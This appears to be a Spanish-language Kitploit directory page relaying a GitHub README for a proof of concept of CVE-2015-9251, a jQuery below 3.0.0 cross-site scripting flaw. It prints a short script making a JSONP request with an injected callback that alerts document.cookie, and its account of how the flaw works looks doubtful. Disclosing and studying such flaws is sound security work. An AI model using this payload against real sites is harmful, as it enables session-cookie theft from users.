Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2015-9251 — PoC para CVE-2015-9251 jQuery menor a 3.0.0. | Kitploit
Herramientas/GitHubGitHub/moften/cve-2015-9251
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmoften/cve-2015-9251

CVE-2015-9251

PoC para CVE-2015-9251 jQuery menor a 3.0.0.

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2015-9251

[email protected]

PoC para CVE-2015-9251 jQuery menor a 3.0.0.

CVE-2015-9251 - PoC Exploit

Este repositorio contiene un Proof of Concept (PoC) para la vulnerabilidad CVE-2015-9251 en la biblioteca jQuery. La vulnerabilidad permite un ataque de Cross-Site Scripting (XSS) a través de llamadas JSONP sin sanitización, debido a que jQuery permite la inyección de código en el parámetro callback en versiones anteriores a la 3.0.0.


Descripción

CVE-2015-9251 afecta a versiones de jQuery anteriores a la 3.0.0. La vulnerabilidad se explota al manipular el parámetro callback en una solicitud JSONP, lo cual puede permitir la ejecución de código JavaScript arbitrario en el navegador de la víctima. Esto puede llevar a la exposición de datos sensibles, como las cookies de sesión.

Requisitos

  1. Entorno de Pruebas: La aplicación web vulnerable debe utilizar una versión de jQuery menor a 3.0.0.
  2. Navegador Web: Para ejecutar el PoC y observar el comportamiento del exploit.
  3. Herramienta de Inspección: Las DevTools del navegador serán útiles para ver los resultados.

Ejecución del PoC

Para ejecutar el PoC, sigue estos pasos:

  1. Copiar y pegar el código en la consola del navegador o incluirlo en una página HTML de prueba.

Código del PoC:

root@kitploit:~
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
  // Función que simula una solicitud a un servidor vulnerable
  $.ajax({
    url: "https://example.com/api?callback=alert(document.cookie)",
    dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
    success: function(response) {
      console.log(response);
    }
  });
</script>
Descargar herramienta